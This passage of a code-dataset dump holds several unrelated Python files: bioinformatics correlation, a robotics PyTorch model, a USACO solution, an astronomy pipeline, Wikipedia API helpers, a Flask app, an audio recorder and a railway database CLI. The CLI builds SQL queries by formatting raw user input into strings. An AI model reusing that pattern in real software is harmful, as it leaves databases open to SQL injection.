clean_anno.columns:\n\t\tg2 = anno_t2g.loc[k, 'gene']\n\t\trho, pval = stats.spearmanr(clean_novel[i], clean_anno[k])\n\t\tsum_table.loc[k + '_rho', i] = rho\n\t\tsum_table.loc[k + '_pval', i] = pval\n\n\t\t# remove comparison inside the same gene\n\t\tif g1 != g2:\n\t\t\tif abs(rho) > 0.8 and pval < 0.05:\n\t\t\t\tsig_table.loc[k, i] = str(rho) + ', ' + str(pval)\nsum_table.to_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\all_cor_novel_anno.csv')\t\t\t\t\nsig_table.to_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\raw_sig_cor_novel_anno.csv')\n\n# annotate results\nnovel_names = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\all_novel_list.txt', index_col = 0, header = None, sep = '\\t')\ntrans_2_gene = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\all_trans_to_gene_list.txt', index_col = 0, header = None, sep = '\\t')\nfinal_table = pd.DataFrame(columns = ['novel', 'parent_gene_ensembl', 'parent_gene', 'anno_ensembl', 'anno', 'rho', 'p-value'])\n\nfor i in sig_table.columns:\n\tfor k in sig_table.index:\n\t\tif pd.isnull(sig_table.loc[k, i]) is False:\n\t\t\tcur_len = len(final_table)\n\t\t\tfinal_table.loc[cur_len, 'novel'] = i\n\t\t\tparent_gene_ensembl = novel_names.loc[i, 1]\n\t\t\tfinal_table.loc[cur_len, 'parent_gene_ensembl'] = parent_gene_ensembl\n\t\t\ttry:\n\t\t\t\tparent_gene = trans_2_gene.loc[parent_gene_ensembl, 2].values[0]\n\t\t\texcept AttributeError:\n\t\t\t\tparent_gene = trans_2_gene.loc[parent_gene_ensembl, 2]\n\t\t\tfinal_table.loc[cur_len, 'parent_gene'] = parent_gene\n\t\t\tfinal_table.loc[cur_len, 'anno_ensembl'] = k\n\t\t\tfinal_table.loc[cur_len, 'anno'] = trans_2_gene[trans_2_gene[1] == k].iloc[0, 2]\n\t\t\tfinal_table.loc[cur_len, 'rho'] = sig_table.loc[k, i].split(',')[0]\n\t\t\tfinal_table.loc[cur_len, 'p-value'] = sig_table.loc[k, 
i].split(',')[1]\nfinal_table.to_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\compiled_sig_cor_novel_anno.csv', index = False)","repo_name":"indigoblueraspberry/ONT_RNAseq_project","sub_path":"analyze_novel_lncRNA/cor_DE_novel_and_anno.py","file_name":"cor_DE_novel_and_anno.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37370839696","text":"import numpy as np\nfrom numpy.linalg import norm\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom omegaconf import DictConfig\nfrom pathlib import Path\nfrom utils import get_device, init_logs_dir, center_crop\nfrom utils.torch_utils import weight_init\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass VolEncoder(nn.Module):\n \"\"\"\n in_shape: (B, C, T, H, W) \n out_shape: (B, C, T, H, W) \n \"\"\"\n def __init__(self, kernel_dim, init_weight=False, lite=False):\n \"\"\"Initialize the layers of the network as instance variables.\"\"\"\n super(VolEncoder, self).__init__()\n self.lite=lite\n self.maxpool = nn.MaxPool3d(2, 2)\n\n self.convd1 = nn.Conv3d(1, 16, 3, stride=1, padding=1)\n self.convd2 = nn.Conv3d(16, 32, 3, stride=2, padding=1)\n self.convd3 = nn.Conv3d(32, 64, 3, stride=2, padding=1)\n self.convd4 = nn.Conv3d(64, 128, 3, stride=2, padding=1)\n\n self.convb_lite = nn.Conv3d(64, 128, 3, stride=2, padding=1)\n self.convb = nn.Conv3d(128, 256, 3, stride=2, padding=1)\n\n self.convu1 = nn.Conv3d(384, 128, 3, stride=1, padding=1)\n self.convu2 = nn.Conv3d(192, 64, 3, stride=1, padding=1)\n self.convu3 = nn.Conv3d(96, 32, 3, stride=1, padding=1)\n self.convf = nn.Conv3d(32, kernel_dim, 1, stride=1, padding=0)\n\n if init_weight:\n self.apply(weight_init)\n\n def forward(self, x):\n \n xd1 = F.relu(self.convd1(x))\n xd2 = F.relu(self.convd2(xd1))\n xd3 = F.relu(self.convd3(xd2))\n if not self.lite:\n xd4 = F.relu(self.convd4(xd3))\n xb = F.relu(self.convb(xd4))\n xu1 = F.relu(self.convu1(torch.cat((xd4, F.interpolate(xb, scale_factor=(2,2,2))), 1)))\n else:\n xu1 = F.relu(self.convb_lite(xd3))\n\n xu2 = F.relu(self.convu2(torch.cat((xd3, F.interpolate(xu1, scale_factor=(2,2,2))), 1)))\n xu3 = F.relu(self.convu3(torch.cat((xd2, F.interpolate(xu2, scale_factor=(2,2,2))), 1)))\n\n output = self.convf(xu3)\n return output\n\nclass VolMatchTransport(nn.Module):\n \"\"\"Transport module.\"\"\"\n\n def __init__(self, \n max_perturb_delta, part_shape, kit_shape, vox_size, kit_padding,\n logs_dir, logger, \n dist_aware_loss, lite=False, upsample=False, device=None):\n \"\"\"Transport module for placing.\n\n Args:\n max_perturb_delta: max purturbations (number of voxels)\n \"\"\"\n super().__init__()\n # print(f'transporter upsample : {upsample}')\n self.device = get_device() if device is None else device\n\n self.part_shape = np.array(part_shape)\n self.kit_shape = np.array(kit_shape)\n self.vox_size = vox_size * 1000 # unit is mm\n self.kit_padding = kit_padding\n # make sure shapes are multiple of 16, and kit is larger than obj\n assert np.all(self.part_shape%16==0) and np.all(self.kit_shape%16==0), \\\n f'expected kit and obj shapes to be multiples of 4 but get {part_shape}, {kit_shape}'\n assert np.all(self.part_shape < self.kit_shape), \\\n f'expected obj shape to be smaller than kit shape but get {part_shape} >= {kit_shape}'\n\n # max perturbations\n self.max_perturb_delta = np.array(max_perturb_delta)\n # kernel dimention for cross-conv\n self.kernel_dim = 6\n # setup\n 
self.lite = lite\n self.upsample = upsample\n\n # volume encoders and optimizer\n self.querynet = VolEncoder(self.kernel_dim, lite=lite).to(self.device)\n self.keynet = VolEncoder(self.kernel_dim, lite=lite).to(self.device)\n params = list(self.querynet.parameters()) + list(self.keynet.parameters())\n if self.upsample:\n self.conv_upsample = nn.Conv3d(1, 16, 3, stride=1, padding=1).to(self.device)\n self.conv_out = nn.Conv3d(16, 1, 1, stride=1, padding=0).to(self.device)\n params += list(self.conv_upsample.parameters()) + list(self.conv_out.parameters())\n self.optim = optim.Adam(params, lr=1e-4)\n self.dist_aware_loss = dist_aware_loss\n\n self.logs_dir = logs_dir\n self.logger = logger\n self.train_step = 0\n\n @staticmethod\n def from_cfg(vm_cfg: DictConfig, vox_size: float, load_model: bool = False, log=True, model_path=None):\n p0_vol_shape = vm_cfg.p0_vol_shape_transport\n p1_vol_shape = vm_cfg.p1_vol_shape_transport\n max_perturb_delta = vm_cfg.max_perturb_delta\n no_user_input = vm_cfg.no_user_input\n kit_padding = (0,)*6\n if no_user_input:\n kit_padding = (8,)*6\n p1_vol_shape = [400,400,256]\n max_perturb_delta = np.array([144, 144, 88])\n dist_aware_loss = vm_cfg.dist_aware_loss\n lite = vm_cfg.lite\n upsample = vm_cfg.upsample\n upsample_str = \"_up\" if upsample else \"\"\n logs_dir, logger = None, None\n if log:\n logs_dir = init_logs_dir(vm_cfg, f'{vm_cfg.vol_type}_transport{upsample_str}_full')\n logger = SummaryWriter(logs_dir / \"tensorboard\")\n model = VolMatchTransport(max_perturb_delta, p0_vol_shape, p1_vol_shape, vox_size, kit_padding,\n logs_dir, logger, dist_aware_loss, lite, upsample)\n if load_model:\n if model_path is None:\n model.load(Path(vm_cfg.transporter_path))\n else:\n model.load(Path(model_path))\n return model\n\n def translate(self, part_vol, kit_vol, train=False):\n self.train(train)\n batch_size = part_vol.shape[0]\n kernel = self.querynet(part_vol) # (B, self.kernel_dim, t, h, w)\n kit_vol = F.pad(kit_vol, self.kit_padding, \"constant\", 1)\n logits = self.keynet(kit_vol) # (B, self.kernel_dim, T, H, W)\n kernel_paddings = (0,1,)*3\n kernel = F.pad(kernel, kernel_paddings, mode='constant', value=0)\n half_conv_size = (self.part_shape//2 + self.max_perturb_delta)//2\n sH, sW, sD = np.array(logits.shape[2:5])//2 - half_conv_size\n eH, eW, eD = np.array(logits.shape[2:5])//2 + half_conv_size\n logits = logits[:,:,sH:eH,sW:eW,sD:eD]\n output = F.conv3d(logits.view(1, batch_size*self.kernel_dim, *logits.shape[2:5]), \n kernel, groups=batch_size) # (1, B, T-t, H-h, W-w)\n output = output.squeeze(0) # (B, T-t, H-h, W-w)\n if self.upsample:\n output = output.unsqueeze(1) # (B, 1, T-t, H-h, W-w)\n output = F.relu(self.conv_upsample(output))\n output = self.conv_out(F.interpolate(output, scale_factor=(2,2,2)))\n output = output.squeeze(1)\n return output\n \n def forward(self, part_vol, kit_vol, train):\n self.train(train)\n part_vol, kit_vol = part_vol.to(self.device).float(), kit_vol.to(self.device).float()\n translate_logits = self.translate(part_vol, kit_vol, train=train)\n # get predictions\n batch_size, search_shape = translate_logits.shape[0], translate_logits.shape[1:4]\n p_crop_pred = np.zeros((batch_size, 3))\n for i in range(batch_size):\n index = torch.argmax(translate_logits[i]).detach().cpu()\n p_crop_pred[i] = np.unravel_index(index, search_shape)\n # lgts = translate_logits[i].detach().cpu().numpy()\n # p_crop_pred[0] = np.unravel_index(np.argmax(lgts), search_shape)\n # for j in range(1,3):\n # x, y, z = np.arange(0, search_shape[0]), 
np.arange(0, search_shape[1]), np.arange(0, search_shape[2])\n # cx, cy, cz = p_crop_pred[j-1]\n # r = 50\n # mask = (x[:,np.newaxis, np.newaxis,]-cx)**2 + (y[np.newaxis, :, np.newaxis]-cy)**2 + (z[np.newaxis, np.newaxis, :]-cz)**2 < r**2\n # lgts[mask] = 0\n # p_crop_pred[j] = np.unravel_index(np.argmax(lgts), search_shape)\n scale_factor = 1 if self.upsample else 2\n p_pred = p_crop_pred * scale_factor \\\n + self.kit_shape[np.newaxis, Ellipsis]//2 \\\n - self.max_perturb_delta[np.newaxis, Ellipsis]\n return translate_logits, p_pred\n\n def calc_loss(self, p_gt, p_pred, translate_logits):\n batch_size, search_shape = translate_logits.shape[0], translate_logits.shape[1:4]\n # calculate gt position in cropped space\n scale_factor = 1 if self.upsample else 2\n p_crop_gt = (p_gt - self.kit_shape[np.newaxis, Ellipsis]//2 + self.max_perturb_delta) // scale_factor\n p_gt_ind = np.zeros(batch_size)\n for i in range(batch_size):\n x, y, z = p_crop_gt[i]\n p_gt_ind[i] = (x*search_shape[1] + y)*search_shape[2] + z\n p_gt_ind = torch.tensor(p_gt_ind).to(self.device).long()\n loss = F.cross_entropy(translate_logits.reshape(batch_size,-1), p_gt_ind)\n gamma = 1\n if self.dist_aware_loss:\n diff = p_gt - p_pred\n avg_norm = sum([norm(v) for v in diff])/diff.shape[0]\n factor = torch.tensor(avg_norm/norm(self.max_perturb_delta))\n gamma = (torch.exp(factor)-1)\n return loss*gamma\n \n def run(self, sample, training=False, log=True, calc_loss=True):\n p0_vol_full, p1_vol_full, p1_coords, p1_coords_user, p1_ori, _, _ = sample.values()\n if training: # return on gt out of range\n half_search_size = self.max_perturb_delta[np.newaxis, Ellipsis]\n val = p1_coords - p1_coords_user + half_search_size\n if (val<0).any() or ((val-half_search_size*2)>=0).any():\n # print(f'Transport: invalid gt: {val}')\n return None, None, None, None\n # crop kit volumes around user provided centers\n batch_size = p0_vol_full.shape[0]\n p0_vol = torch.empty(batch_size, *self.part_shape)\n p1_vol = torch.empty(batch_size, *self.kit_shape)\n part_crop_center = np.array(p0_vol_full.shape[1:4])//2\n if torch.is_tensor(p1_coords_user):\n p1_coords_user = p1_coords_user.detach().cpu().numpy()\n if torch.is_tensor(p1_coords):\n p1_coords = p1_coords.detach().cpu().numpy()\n for i in range(batch_size):\n p0_vol[i] = center_crop(p0_vol_full[i], part_crop_center, self.part_shape)\n p1_vol[i] = center_crop(p1_vol_full[i], p1_coords_user[i], self.kit_shape)\n\n p0_vol, p1_vol = p0_vol.unsqueeze(1), p1_vol.unsqueeze(1) # add in channel dim\n translate_logits, p_pred = self.forward(p0_vol, p1_vol, train=training)\n p_gt = None\n if p1_coords is not None:\n p_gt = p1_coords - p1_coords_user + self.kit_shape[np.newaxis, Ellipsis]//2\n p_diff, loss_cpu = None, None\n if p_gt is not None:\n diff = p_gt - p_pred\n p_diff = sum([norm(v) for v in diff])/diff.shape[0]\n if calc_loss:\n loss = self.calc_loss(p_gt, p_pred, translate_logits)\n loss_cpu = loss.cpu().detach().item()\n if training:\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n self.train_step += 1\n if log:\n # print(f'p_diff: {p_diff:.3f}, p_gt: {p_gt}, p_pred: {p_pred}')\n self.log(loss_cpu, p_diff)\n p_diff *= self.vox_size \n\n p_pred = p_pred + p1_coords_user - np.array(self.kit_shape//2)\n return loss_cpu, p_pred, None, p_diff\n\n def log(self, loss, p_diff):\n if self.logger == None:\n return\n log_dic = {\n 'total_loss': loss,\n 'p_diff': p_diff,\n }\n for k, v in log_dic.items():\n self.logger.add_scalar(k, v, self.train_step)\n\n def load(self, 
transport_fname):\n print(f'Loaded from {transport_fname}')\n checkpoint = torch.load(transport_fname, map_location=self.device)\n self.keynet.load_state_dict(checkpoint['keynet_state_dict'])\n self.querynet.load_state_dict(checkpoint['querynet_state_dict'])\n if self.upsample:\n self.conv_upsample.load_state_dict(checkpoint['conv_upsample'])\n self.conv_out.load_state_dict(checkpoint['conv_out'])\n self.train_step = checkpoint['train_step']\n\n def save(self):\n state = {'keynet_state_dict': self.keynet.state_dict(),\n 'querynet_state_dict': self.querynet.state_dict(),\n 'train_step': self.train_step}\n if self.upsample:\n state['conv_upsample'] = self.conv_upsample.state_dict()\n state['conv_out'] = self.conv_out.state_dict()\n path = self.logs_dir/f\"{self.train_step}_transporter.pth\"\n torch.save(state, path)\n print(f\"Model saved at path: {path}\")\n\nif __name__ == \"__main__\":\n model = VolEncoder(3, lite=True)\n volume = torch.rand(1,1,32,32,32)\n out = model(volume)\n print(out.shape)\n model = VolEncoder(3, lite=False)\n volume = torch.rand(1,1,32,32,32)\n out = model(volume)\n print(out.shape)","repo_name":"columbia-ai-robotics/SEaT","sub_path":"learning/vol_match_transport.py","file_name":"vol_match_transport.py","file_ext":"py","file_size_in_byte":13045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1857394984","text":"file=open('lifeguards.in','r')\nn=int(file.readline())\nshifts=[]\nfor i in range(n):\n arr = [int(x) for x in file.readline().split()]\n shifts.append(arr)\ndef calc(shifts,miss):\n points=[0]*1000\n for i in range(len(shifts)):\n for j in range(shifts[i][0],shifts[i][1]):\n if i!=miss:\n points[j]=1\n x=points.count(1)\n return x\nans=0\nfile.close()\nfor a in range(n):\n tot=calc(shifts,a)\n ans=max(ans,tot)\nprint(ans)\no=open('lifeguards.out','w')\no.write(str(ans))\no.close()\n","repo_name":"funnoodle11/USACO","sub_path":"2018JanBronze/lifeguards.py","file_name":"lifeguards.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28295599999","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport multiprocessing\nimport collections\n\nimport lsst.pex.logging as pexLog\nimport lsst.obs.lsstSim as lsstSim\nimport lsst.pipette.config as pipConfig\nimport lsst.pipette.processCcd as pipProcCcd\nimport lsst.pipette.options as pipOptions\nimport lsst.pipette.catalog as pipCatalog\nimport lsst.pipette.readwrite as pipReadWrite\n\nInputs = collections.namedtuple('Inputs', ['rerun', 'visit', 'snap', 'raft', 'sensor', 'config', 'log'])\n\ndef run(inputs):\n rerun = inputs.rerun\n visit = inputs.visit\n snap = inputs.snap\n raft = inputs.raft\n sensor = inputs.sensor\n config = inputs.config\n log = inputs.log\n\n pexLog.Log.getDefaultLog().addDestination(log)\n\n io = pipReadWrite.ReadWrite(lsstSim.LsstSimMapper, ['visit', 'snap', 'raft', 'sensor'],\n fileKeys=['visit', 'snap', 'raft', 'sensor', 'channel'], config=config)\n roots = config['roots']\n basename = os.path.join(roots['output'], '%s-%d-%d-%s-%s' % (rerun, visit, snap, raft, sensor))\n ccdProc = pipProcCcd.ProcessCcd(config=config, log=pexLog.Log.getDefaultLog())\n dataId = {'visit': visit, 'snap': snap, 'raft': raft, 'sensor': sensor}\n\n detrends = io.detrends(dataId, config)\n if len([x for x in detrends if x]): # We need to run at least part of the ISR\n raws = io.readRaw(dataId)\n else:\n io.fileKeys = ['visit', 'raft', 'sensor']\n 
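# No usable detrend frames were found, so skip the ISR inputs and read the already-calibrated 'calexp' exposure instead of the raw frames.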
raws = io.read('calexp', dataId)\n detrends = None\n\n exposure, psf, brightSources, apcorr, sources, matches, matchMeta = ccdProc.run(raws, detrends)\n \n io.write(dataId, exposure=exposure, psf=psf, sources=sources, matches=matches, matchMeta=matchMeta)\n\n catPolicy = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"catalog.paf\")\n catalog = pipCatalog.Catalog(catPolicy, allowNonfinite=False)\n if sources is not None:\n catalog.writeSources(basename + '.sources', sources, 'sources')\n if matches is not None:\n catalog.writeMatches(basename + '.matches', matches, 'sources')\n return\n\ndef getConfig(overrideFile=None):\n \"\"\"Return a proper config object, maybe given the name of policy file with an additional set of overrides\"\"\"\n \n default = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"ProcessCcdDictionary.paf\")\n overrides = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"lsstSim.paf\")\n config = pipConfig.configuration(default, overrides)\n if overrideFile:\n config.merge(pipConfig.Config(overrideFile))\n\n return config\n\ndef require(value, name):\n if value is None:\n print >> sys.stderr, \"Please specify %s\" % name\n sys.exit(1)\n \n\nif __name__ == \"__main__\":\n parser = pipOptions.OptionParser()\n parser.add_option(\"-R\", \"--rerun\", default=os.getenv(\"USER\", default=\"rerun\"), dest=\"rerun\",\n help=\"Rerun name (default=%default)\")\n parser.add_option(\"-v\", \"--visit\", type=\"int\", dest=\"visit\", help=\"Visit to run\")\n parser.add_option(\"-S\", \"--snap\", type=\"int\", dest=\"snap\", help=\"Snap to run\")\n parser.add_option(\"-T\", \"--threads\", type=\"int\", dest=\"threads\", help=\"Number of threads\")\n\n default = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"ProcessCcdDictionary.paf\")\n overrides = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"lsstSim.paf\")\n config, opts, args = parser.parse_args([default, overrides])\n if len(args) > 0:\n print >> sys.stderr, 'Unrecognized arguments: \"%s\"' % '\", '.join(args)\n sys.exit(1)\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n require(opts.rerun, \"rerun\")\n require(opts.visit, \"visit\")\n require(opts.snap, \"snap\")\n require(opts.threads, \"threads\")\n\n inputs = list()\n for rx in range(5):\n for ry in range(5):\n if (rx,ry) in ((0,0), (0,4), (4,0), (4,4)):\n continue\n raft = \"%d,%d\" % (rx, ry)\n for sx in range(3):\n for sy in range(3):\n sensor = \"%d,%d\" % (sx, sy)\n logName = \"%s.%d%d%d%d.log\" % (opts.rerun, rx, ry, sx, sy)\n inputs.append(Inputs(rerun=opts.rerun, visit=opts.visit, snap=opts.snap,\n raft=raft, sensor=sensor, config=config, log=logName))\n\n pool = multiprocessing.Pool(processes=opts.threads, maxtasksperchild=1)\n pool.map(run, inputs)\n pool.close()\n pool.join()\n","repo_name":"lsst-dm/legacy-pipette","sub_path":"bin/lsstSimPool.py","file_name":"lsstSimPool.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42218270718","text":"import requests\nimport re\n\ndef callAPI(extraParams):\n baseParams = {\n 'format': 'json',\n 'formatversion': '2'\n }\n headers = {\n 'User-Agent': 'CIS*3210 WIKI TEST BOT'\n }\n params = {**baseParams, **extraParams}\n\n r = requests.get('http://en.wikipedia.org/w/api.php', params=params, headers=headers)\n return r.json()\n\ndef searchForPage(title):\n params = {\n 'action': 'opensearch',\n 'search': title\n }\n x = callAPI(extraParams=params)\n return(x)\n\ndef 
getPageSummary(title, numSentences):\n params = {\n 'action': 'query',\n 'prop': 'extracts',\n 'titles': title,\n 'redirects': 'true',\n 'exintro': '',\n 'explaintext': '',\n 'exsentences': str(numSentences)\n }\n res = callAPI(extraParams=params)\n page = res['query']['pages'][0]['extract']\n return(page)\n\ndef getPageImage(title):\n params = {\n 'action': 'query',\n 'prop': 'pageimages',\n 'titles': title,\n 'redirects': 'true',\n 'piprop':'original',\n 'pilicense':'any'\n }\n res = callAPI(extraParams=params)\n return(res['query']['pages'][0]['original']['source'])\n\ndef getURL(title):\n params = {\n 'action': 'query',\n 'prop': 'info',\n 'titles': title,\n 'redirects': 'true',\n 'inprop': 'url'\n }\n res = callAPI(extraParams=params)\n return res['query']['pages'][0]['canonicalurl']\n\ndef getCategories(title):\n params = {\n 'action': 'query',\n 'prop': 'categories',\n 'titles': title,\n 'redirects': 'true',\n 'cllimit': 'max'\n }\n res = callAPI(extraParams=params)\n return res['query']['pages'][0]['categories']\n\ndef isVideoGame(title):\n categories = getCategories(title)\n for category in categories:\n if bool(re.search(\"video game\", category['title'], re.IGNORECASE)):\n return True\n \n return False","repo_name":"Quantaxer/Game-Backlogger","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18587801564","text":"#!/usr/bin/python3\n\"\"\" Starts a Flash Web Application \"\"\"\nimport os\nimport uuid\nfrom flask import Flask, render_template\n\nfrom models import storage\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.state import State\n\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\" Remove the current SQLAlchemy Session \"\"\"\n storage.close()\n\n\n@app.route('/1-hbnb', strict_slashes=False)\ndef hbnb():\n \"\"\" HBNB is alive! 
\"\"\"\n states = storage.all(State).values()\n states = sorted(states, key=lambda k: k.name)\n st_ct = []\n for state in states:\n st_ct.append([state, sorted(state.cities, key=lambda k: k.name)])\n amenities = storage.all(Amenity).values()\n amenities = sorted(amenities, key=lambda k: k.name)\n places = storage.all(Place).values()\n places = sorted(places, key=lambda k: k.name)\n ctxt = {\n 'states': st_ct,\n 'amenities': amenities,\n 'places': places,\n 'cache_id': uuid.uuid4()\n }\n return render_template('1-hbnb.html', **ctxt)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"BOSTONE069/AirBnB_clone_v4","sub_path":"web_dynamic/1-hbnb.py","file_name":"1-hbnb.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"41380133904","text":"\nimport sounddevice as sd\nfrom scipy.io.wavfile import write\nimport wavio as wv\n\ndef record_audio_wav(filename, duration=5, sample_rate=44100, channels=2):\n print(f\"Recording for {duration} seconds...\")\n\n # Start recorder with the given values\n recording = sd.rec(int(duration * sample_rate),\n samplerate=sample_rate, channels=channels, dtype='int16')\n\n # Record audio for the given number of seconds\n sd.wait()\n\n # Save the recorded audio as a WAV file using scipy.io.wavfile.write\n write(filename, sample_rate, recording)\n\n # Alternatively, save the recorded audio using wavio\n wv.write(filename, recording, sample_rate, sampwidth=2)\n\n print(f\"Recording saved as {filename}\")\n\nif __name__ == \"__main__\":\n output_filename = \"recorded_audio.wav\"\n recording_duration = 6 # Set the desired recording duration in seconds\n\n record_audio_wav(output_filename, recording_duration)\n\n# import sounddevice as sd\n# from scipy.io.wavfile import write\n# import wavio as wv\n# import keyboard\n\n# def record_audio_wav(filename, duration=5, sample_rate=44100, channels=2):\n# print(f\"Recording for {duration} seconds... 
Press 'Esc' to stop.\")\n\n# # Initialize an empty array to store the recorded audio\n# recording = []\n\n# def callback(indata, frames, time, status):\n# if status:\n# print(f\"Error in recording: {status}\")\n# else:\n# # Append the recorded audio data to the array\n# recording.extend(indata.copy())\n\n# # Start recorder with the given values\n# with sd.InputStream(callback=callback, channels=channels, samplerate=sample_rate):\n# start_time = sd.get_stream().time\n# while sd.get_stream().time - start_time < duration and not keyboard.is_pressed('esc'):\n# pass # Continue recording until the specified duration or 'Esc' key press\n\n# # Save the recorded audio as a WAV file using scipy.io.wavfile.write\n# write(filename, sample_rate, recording)\n\n# # Alternatively, save the recorded audio using wavio\n# wv.write(filename, recording, sample_rate, sampwidth=2)\n\n# print(f\"Recording saved as {filename}\")\n\n# if __name__ == \"__main__\":\n# output_filename = \"recorded_audio.wav\"\n\n# record_audio_wav(output_filename)\n","repo_name":"vieveks/pingu","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3331792055","text":"import subprocess as sp\nimport pymysql\nimport pymysql.cursors\nimport random\nfrom tabulate import tabulate\n\ndef option2():\n \"\"\"\n Function to implement option 2\n \"\"\"\n print(\"Not implemented\")\n\n\ndef promote():\n \"\"\"\n Function to implement Promote Employee\n \"\"\"\n print(\"-x-x-x-x-x-x- Promote Employee -x-x-x-x-x-x-\")\n while True:\n name = input(\"Name of the employee (Fname Lname): \").split(' ')\n query = \"SELECT * FROM RAILWAY_EMPLOYEES_A WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Employee <\", name[0], \", \", name[1], \"> not found\")\n while True:\n des = input(\"Promote to: \")\n query = \"SELECT * FROM RAILWAY_EMPLOYEES_B WHERE Designation = '%s'\" % (des)\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab) == 0:\n print(\"Promotion to <\", des,\"> is not possible\")\n else:\n break\n while True:\n transfer = input(\"Transfer to: \")\n query = \"SELECT * FROM STATIONS WHERE StationID = '%s'\" % (transfer)\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab) == 0:\n print(\"Transfer to <\", transfer, \"> is not possible\")\n else:\n break\n query = \"UPDATE RAILWAY_EMPLOYEES_A SET Designation = '%s', StationID = '%s' WHERE FirstName = '%s' AND LastName = '%s'\" %(des, transfer, name[0], name[1])\n cur.execute(query)\n query = \"UPDATE EMPLOYEES_CONTACT_NUMBERS SET Designation = '%s' WHERE FirstName = '%s' AND LastName = '%s'\" %(des, name[0], name[1])\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM RAILWAY_EMPLOYEES_A WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n\ndef pre_postpone():\n \"\"\"\n Function to implement Change DOJ\n \"\"\"\n print(\"-x-x-x-x-x-x- Change DOJ -x-x-x-x-x-x-\")\n while True:\n name = input(\"Name of the passenger (Fname Lname): \").split(' ')\n query = \"SELECT * FROM PASSENGERS WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n if len(tab):\n 
print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Employee <\", name[0], \", \", name[1], \"> not found\")\n date = input(\"Change to (YYYY-MM-DD): \")\n query = \"UPDATE PASSENGERS SET DOJ = '%s', Tier = '%d', SeatNo = '%d' WHERE FirstName = '%s' AND LastName = '%s'\" % (date, random.randint(1, 5), random.randint(1, 65), name[0], name[1])\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM PASSENGERS WHERE FirstName = '%s' AND LastName = '%s'\" % (name[0], name[1])\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n\ndef renovate():\n \"\"\"\n Renovate a Station or a Train\n \"\"\"\n while True:\n query = input(\"What would you like to renovate? (Station or Train) \")\n if query == \"Station\":\n while True:\n id = input(\"Enter the Station ID: \")\n query = \"SELECT * FROM STATIONS WHERE StationID = '%s'\" % (id)\n cur.execute(query)\n tab =cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Station <\", id, \"> not found\")\n name = input(\"Enter the new Station Name: \")\n n_id = input(\"Enter the new Station ID: \")\n query = \"UPDATE STATIONS SET StationName = '%s', StationID = '%s' WHERE StationID = '%s'\" % (name, n_id, id)\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM STATIONS WHERE StationID = '%s'\" % (n_id)\n cur.execute(query)\n tab = cur.fetchall()\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n return\n elif query == \"Train\":\n while True:\n name = input(\"Enter the Train Name: \")\n query = \"SELECT * FROM TRAINS WHERE TrainName = '%s'\" % (name)\n cur.execute(query)\n tab =cur.fetchall()\n if len(tab):\n print(tabulate(tab, headers=\"keys\", tablefmt='psql'))\n break\n else:\n print(\"Train <\", name, \"> not found\")\n n_name = input(\"Enter the new Train Name: \")\n num = int(input(\"Enter the new Train Number: \"))\n query = \"UPDATE TRAINS SET TrainName = '%s', TrainNumber = '%d' WHERE TrainName = '%s'\" % (n_name, num, name)\n cur.execute(query)\n con.commit()\n\n print(\"The updated entry is: \")\n query = \"SELECT * FROM 